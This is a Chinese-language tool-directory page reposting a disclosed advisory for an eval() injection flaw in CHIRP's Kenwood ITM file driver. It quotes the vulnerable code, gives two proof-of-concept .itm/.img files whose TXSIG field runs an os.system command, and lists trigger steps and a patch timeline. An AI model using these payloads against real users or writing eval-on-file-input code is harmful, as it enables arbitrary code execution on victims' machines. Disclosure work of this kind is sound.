Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CHIRP-CodeExecution_via_Malicious_ImageFile — 用于在业余无线电编程应用中通过 eval() 注入实现任意代码执行的概念验证漏洞利用,包含恶意 .itm/.img 文件载荷及根本原因分析。 | Kitploit
工具/GitHubGitHub/cduram/chirp-codeexecution_via_malicious_imagefile
漏洞分析漏洞利用Payload 开发
GitHubcduram/chirp-codeexecution_via_malicious_imagefile

CHIRP-CodeExecution_via_Malicious_ImageFile

用于在业余无线电编程应用中通过 eval() 注入实现任意代码执行的概念验证漏洞利用,包含恶意 .itm/.img 文件载荷及根本原因分析。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
1天前尚未审核

CHIRP — 通过 Kenwood ITM 驱动中的 eval() 实现任意代码执行

产品: CHIRP - 一个用于业余无线电编程的开源项目。
受影响版本: URL: https://github.com/kk7ds/chirp, https://chirpmyradio.com
受影响版本: <= chirp-next-20260814
CWE: CWE-95(Eval 注入)


概述

CHIRP 的 Kenwood ITM 文件格式驱动程序会将打开文件中的原始 CSV 字段值直接传递给 Python 内置的 eval(),且不进行任何验证。攻击者向 CHIRP 用户提供精心构造的文件,即可以受害用户的身份实现任意代码执行。

根本原因

chirp/drivers/kenwood_itm.py 中的 _clean_tmode(),第 66–67 行:

root@kitploit:~
def _clean_tmode(self, headers, line, mem):
    rtone = eval(generic_csv.get_datum_by_header(headers, line, "TXSIG"))  # SINK
    ctone = eval(generic_csv.get_datum_by_header(headers, line, "RXSIG"))  # SINK

TXSIG 和 RXSIG 值直接来自打开文件中的 CSV 行。在调用 eval() 之前,未进行任何类型检查、白名单或沙箱处理。

POC

以下是两个 POC。

恶意 .itm

root@kitploit:~
// Malicious .itm POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,1,146.520000,146.520000,PoC,__import__('os').system('calc'),0

恶意 .img

root@kitploit:~
// Malicious .img POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,0,146520000,146520000,PoC,__import__('os').system('calc.exe'),0

 chirpεimgeyJyY2xhc3MiOiAiSVRNUmFkaW8iLCAidmVuZG9yIjogIktlbndvb2QiLCAibW9kZWwiOiAiSVRNIiwgInZhcmlhbnQiOiAiIiwgImNoaXJwX3ZlcnNpb24iOiAiZGFpbHktMjAyMzAxMDEifQ==

在 CHIRP 中触发

  1. 启动 CHIRP。
  2. 文件 → 打开。
  3. 选择 {file_name}.img。 如果使用 .itm 载荷,请将过滤器下拉框更改为 “所有文件”(ITM 不在 CHIRP 的过滤选项中)。
  4. 选择 {file_name}.itm。

披露

2026-08-17 -- 发现漏洞
2026-08-17 -- 通过电子邮件联系维护者
2026-08-17 -- 维护者当天回复并在同一天修复了代码。 https://github.com/kk7ds/chirp/commit/39178dbfc4fece083ab9ed20286d6ae3a91a718e
2026-08-21 -- 安装程序版本 20260821 包含了该修复。

下载工具